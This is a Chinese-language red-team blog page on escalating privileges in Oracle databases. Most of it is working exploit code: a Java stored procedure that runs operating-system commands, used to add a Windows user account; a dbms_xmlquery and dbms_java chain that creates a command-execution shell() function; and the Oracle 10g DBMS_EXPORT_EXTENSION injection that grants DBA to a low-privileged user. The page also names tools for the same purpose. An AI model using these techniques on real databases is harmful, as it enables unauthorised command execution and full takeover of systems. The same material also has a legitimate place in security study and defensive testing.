<h2 id="Oracle提权"><a href="#Oracle提权" class="headerlink" title="Oracle提权"></a>Oracle提权</h2><p><strong>系统权限</strong></p>
<p>系统规定用户使用数据库的权限（系统权限是对用户而言）</p>
<p><strong>系统权限分类</strong></p>
<blockquote>
<p><strong>DBA：</strong>拥有全部特权，是系统最高权限，只有DBA才可以创建数据库结构。<br><strong>RESOURCE：</strong>拥有Resource权限的用户只可以创建实体，不可以创建数据库结构。<br><strong>CONNECT：</strong>拥有Connect权限的用户只可以登录Oracle，不可以创建实体，不可以创建数据库结构。</p>
</blockquote>
<p>对于普通用户：授予connect, resource权限。<br>对于DBA管理用户：授予connect，resource, dba权限。</p>
<p><strong>实体权限</strong></p>
<p>某种权限用户对其它用户的表或视图的存取权限（是针对表或视图而言的）</p>
<p><strong>实体权限分类</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span>, <span class="keyword">update</span>, <span class="keyword">insert</span>, <span class="keyword">alter</span>, <span class="keyword">index</span>, <span class="keyword">delete</span>, <span class="keyword">all</span> <span class="comment">--all包括所有权限</span></span><br><span class="line"><span class="keyword">execute</span> <span class="comment">--执行存储过程权限</span></span><br></pre></td></tr></table></figure>

<h3 id="一、存储过程提权"><a href="#一、存储过程提权" class="headerlink" title="一、存储过程提权"></a>一、存储过程提权</h3><p>当用户拥有创建存储过程权限时，则可以创建一个java class，然后用创建一个存储过程来进行调用 </p>
<p><strong>提权步骤</strong></p>
<p>1、查看用户是否具有create procedure权限</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">SQL&gt; select * form session_privs;</span><br></pre></td></tr></table></figure>

<p>2、 创建一个java class然后用procedure包装它进行调用 </p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">or</span> <span class="keyword">replace</span> <span class="keyword">and</span> resolve <span class="keyword">java</span> <span class="keyword">source</span> named CMD <span class="keyword">as</span></span><br><span class="line">    <span class="keyword">import</span> java.lang.*;</span><br><span class="line">    import java.io.*;</span><br><span class="line">    public class CMD</span><br><span class="line">    &#123;</span><br><span class="line">       public static void execmd(String command) throws IOException </span><br><span class="line">		&#123;</span><br><span class="line">               Runtime.getRuntime().exec(command); </span><br><span class="line">       	&#125; </span><br><span class="line">   	&#125;</span><br><span class="line">  	/</span><br></pre></td></tr></table></figure>

<p>3、 创建存储过程 </p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">or</span> <span class="keyword">replace</span> <span class="keyword">procedure</span> CMDPROC(command <span class="keyword">in</span> <span class="built_in">varchar</span>) <span class="keyword">as</span> <span class="keyword">language</span> <span class="keyword">java</span> </span><br><span class="line">    <span class="keyword">name</span> <span class="string">'CMD.execmd(java.lang.String)'</span>;</span><br><span class="line">/</span><br></pre></td></tr></table></figure>

<p>4、执行命令（添加一个系统管理员账户）</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">SQL&gt; EXEC CMDPROC('net user winuser ha@Pass123 /add');</span><br></pre></td></tr></table></figure>

<h3 id="二、利用java权限提权"><a href="#二、利用java权限提权" class="headerlink" title="二、利用java权限提权"></a>二、利用java权限提权</h3><p>1、先使用dba权限赋予用户java运行权限</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">SQL&gt; grant JAVASYSPRIV to system;</span><br></pre></td></tr></table></figure>

<p>2、创建jar包</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object &#123;public static String runCMD(String args) &#123;try&#123;BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;&#125; catch (Exception e)&#123;return e.toString();&#125;&#125;&#125;'';commit;end;'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></table></figure>

<p> DUAL是Oracle与数据字典一起自动创建的一个表，它只有一列 </p>
<p>3、使用JAVA获取权限</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> dbms_xmlquery.newcontext(<span class="string">'declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''&lt;&lt;ALL FILES&gt;&gt;'''',''''EXECUTE'''');end;''commit;end;'</span>) <span class="keyword">from</span> dual;</span><br></pre></td></tr></table></figure>

<p>4、创建执行命令的函数select </p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">dbms_xmlquery.newcontext('<span class="keyword">declare</span> <span class="keyword">PRAGMA</span> AUTONOMOUS_TRANSACTION;<span class="keyword">begin</span> <span class="keyword">execute</span> <span class="keyword">immediate</span> <span class="string">''</span><span class="keyword">create</span> <span class="keyword">or</span> <span class="keyword">replace</span> <span class="keyword">function</span> shell(p_cmd <span class="keyword">in</span> <span class="built_in">varchar2</span>) <span class="keyword">return</span> <span class="built_in">varchar2</span> <span class="keyword">as</span> <span class="keyword">language</span> <span class="keyword">java</span> <span class="keyword">name</span> <span class="string">''''</span>LinxUtil.runCMD(java.lang.String) <span class="keyword">return</span> <span class="keyword">String</span><span class="string">''''</span>; '';<span class="keyword">commit</span>;<span class="keyword">end</span>;') from dual;</span><br></pre></td></tr></table></figure>

<p>5、执行命令</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">SQL&gt; select shell('whoami') from dual;</span><br></pre></td></tr></table></figure>

<h3 id="三、Oracle-10g-经典漏洞提权"><a href="#三、Oracle-10g-经典漏洞提权" class="headerlink" title="三、Oracle 10g 经典漏洞提权"></a>三、Oracle 10g 经典漏洞提权</h3><blockquote>
<p><strong><code>oracle &lt; 10.2.0.4</code>的版本有此漏洞</strong></p>
<p>在 Oracle 10g 中，GET_DOMAIN_INDEX_TABLES 函数存在注入漏洞</p>
<p>该函数位于 DBMS_EXPORT_EXTENSION 包中，执行权限隶属于 sys。</p>
</blockquote>
<p>假设<strong>test</strong>是一个只有CONNECT和RESOURCE两个权限较低的角色</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> user_role_privs;    <span class="comment">--首先，查询用户权限配置</span></span><br><span class="line"></span><br><span class="line"><span class="comment">--创建程序包</span></span><br><span class="line"><span class="keyword">Create</span> <span class="keyword">or</span> <span class="keyword">REPLACE</span></span><br><span class="line"><span class="keyword">PACKAGE</span> HACKERPACKAGE <span class="keyword">AUTHID</span> <span class="keyword">CURRENT_USER</span></span><br><span class="line"><span class="keyword">IS</span></span><br><span class="line"><span class="keyword">FUNCTION</span> ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 <span class="built_in">VARCHAR2</span>,p4 <span class="built_in">VARCHAR2</span>,env</span><br><span class="line">SYS.odcienv)</span><br><span class="line"><span class="keyword">RETURN</span> <span class="built_in">NUMBER</span>;</span><br><span class="line"><span class="keyword">END</span>;</span><br><span class="line">/</span><br><span class="line"></span><br><span class="line"><span class="comment">--创建程序包体</span></span><br><span class="line"><span class="keyword">Create</span> <span class="keyword">or</span> <span class="keyword">REPLACE</span> <span class="keyword">PACKAGE</span> <span class="keyword">BODY</span> HACKERPACKAGE</span><br><span class="line"><span class="keyword">IS</span></span><br><span class="line"><span class="keyword">FUNCTION</span> ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 <span class="built_in">VARCHAR2</span>,p4 <span class="built_in">VARCHAR2</span>,env</span><br><span class="line">SYS.odcienv)</span><br><span class="line"><span class="keyword">RETURN</span> <span class="built_in">NUMBER</span></span><br><span class="line"><span class="keyword">IS</span></span><br><span class="line"><span class="keyword">pragma</span> autonomous_transaction;</span><br><span class="line"><span class="keyword">BEGIN</span></span><br><span class="line"><span class="keyword">EXECUTE</span> <span class="keyword">IMMEDIATE</span> <span class="string">'GRANT DBA TO test'</span>;</span><br><span class="line"><span class="keyword">COMMIT</span>;</span><br><span class="line">RETURN(1);</span><br><span class="line"><span class="keyword">END</span>;</span><br><span class="line"><span class="keyword">END</span>;</span><br><span class="line">/</span><br><span class="line"></span><br><span class="line"><span class="comment">--创建过程</span></span><br><span class="line"><span class="keyword">DECLARE</span></span><br><span class="line">INDEX_NAME <span class="built_in">VARCHAR2</span>(<span class="number">200</span>);</span><br><span class="line">INDEX_SCHEMA VARCHAR2(200);</span><br><span class="line">TYPE_NAME VARCHAR2(200);</span><br><span class="line">TYPE_SCHEMA VARCHAR2(200);</span><br><span class="line">VERSION VARCHAR2(200);</span><br><span class="line">NEWBLOCK PLS_INTEGER;</span><br><span class="line">GMFLAGS NUMBER;</span><br><span class="line">v_Return VARCHAR2(200);</span><br><span class="line"><span class="keyword">BEGIN</span></span><br><span class="line">INDEX_NAME := <span class="string">'A1'</span>;</span><br><span class="line">INDEX_SCHEMA := 'test';</span><br><span class="line">TYPE_NAME := 'HACKERPACKAGE';</span><br><span class="line">TYPE_SCHEMA := 'SCOTT';</span><br><span class="line">VERSION := '10.2.0.1.0';</span><br><span class="line">GMFLAGS := 1;</span><br><span class="line">v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME =&gt;</span><br><span class="line">INDEX_NAME,</span><br><span class="line">INDEX_SCHEMA=&gt; INDEX_SCHEMA,</span><br><span class="line">TYPE_NAME =&gt; TYPE_NAME,</span><br><span class="line">TYPE_SCHEMA =&gt; TYPE_SCHEMA,</span><br><span class="line">VERSION =&gt; VERSION,</span><br><span class="line">NEWBLOCK =&gt; NEWBLOCK,</span><br><span class="line">GMFLAGS =&gt; GMFLAGS);</span><br><span class="line"><span class="keyword">END</span>;</span><br><span class="line">/</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> user_role_privs;    <span class="comment">--最后，查询用户权限配置</span></span><br></pre></td></tr></table></figure>

<p><strong>利用工具提权</strong></p>
<p><strong>利用MSF、<a href="https://github.com/quentinhardy/odat" target="_blank" rel="noopener">odat</a>、<a href="https://github.com/jas502n/oracleShell" target="_blank" rel="noopener">OracleShell.jar</a></strong>等工具也可以实现提权</p>

            </div>
        
        <footer class="article-footer">
        </footer>
    </div>
</article>


    
<nav id="article-nav">
    
        <a href="/2020/08/06/%E3%80%903%E3%80%91%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/%E3%80%904%20%E7%BA%A2%E9%98%9F%E3%80%91%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E7%B3%BB%E7%BB%9F%E5%90%8E%E9%97%A8/" id="article-nav-newer" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Newer</strong>
            <div class="article-nav-title">
                
                    【4 红队】权限维持之--系统后门
                
            </div>
        </a>
    
    
        <a href="/2020/08/06/%E3%80%903%E3%80%91%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/%E3%80%904%20%E7%BA%A2%E9%98%9F%E3%80%91%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8BC2/" id="article-nav-older" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Older</strong>
            <div class="article-nav-title">【2 红队】权限维持之--C2免杀</div>
        </a>
    
</nav>





    
    




<!-- baidu url auto push script -->
<script type="text/javascript">
    !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=window.location.href,o=document.referrer;if(!e.test(r)){var n="//api.share.baidu.com/s.gif";o?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var t=new Image;t.src=n}}(window);
</script>     
</section>
        </div>
        <footer id="footer">
    <div class="outer">
        <div id="footer-info" class="inner">
            wintrysec &copy; 2020 
            <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/80x15.png" /></a>
            <br> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>. Theme - <a href="https://github.com/zthxxx/hexo-theme-Wikitten" target="_blank" rel="noopener">wikitten</a>
            
                <br>
                <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span></span>
                &nbsp;|&nbsp;
                <span id="busuanzi_container_site_pv"><i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span></span>
            
        </div>
    </div>
</footer>

        

    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    
        <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true,
            TeX: {
                equationNumbers: {
                  autoNumber: 'AMS'
                }
            }
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script async src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


    </div>
</body>
</html>